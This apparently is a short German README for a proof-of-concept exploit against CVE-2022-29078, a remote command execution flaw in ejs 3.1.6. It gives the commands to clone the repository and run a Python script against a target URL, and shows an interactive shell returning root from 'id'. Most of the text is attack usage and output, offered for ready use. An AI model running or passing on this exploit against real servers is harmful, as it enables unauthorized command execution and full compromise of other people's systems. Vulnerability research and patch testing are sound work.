
Proof-of-Concept-Exploit für CVE-2022-29078 (ejs 3.1.6), der über ein Python-Skript die Remote-Befehlsausführung ermöglicht. Akzeptiert eine Ziel-URL und stellt eine interaktive Shell bereit.
Einfacher PoC für CVE-2022-29078 (anfälliges ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
Es erscheint eine Eingabeaufforderung zur Ausführung von Befehlen
$ id
uid=0(root) gid=0(root) groupes=0(root)